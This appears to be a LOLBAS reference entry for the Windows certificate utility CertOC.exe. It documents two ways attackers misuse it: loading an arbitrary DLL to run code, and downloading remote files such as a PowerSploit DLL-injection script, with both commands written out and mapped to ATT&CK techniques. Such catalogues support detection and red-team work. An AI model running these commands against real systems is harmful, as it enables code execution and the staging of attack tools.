.. /CertOC.exe
Star

Execute (DLL)
Download

Used for installing certificates


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Loads the target DLL file

    certoc.exe -LoadDLL "C:\test\calc.dll"
    Use case
    Execute code within DLL file
    Privileges required
    User
    Operating systems
    Windows Server 2022
    ATT&CK® technique
    T1218
    Tags
    Execute: DLL
    This LOLBAS executes Dynamic-Link Libraries (DLLs).

Download

  1. Downloads text formatted files

    certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
    Use case
    Download scripts, webshells etc.
    Privileges required
    User
    Operating systems
    Windows Server 2022
    ATT&CK® technique
    T1105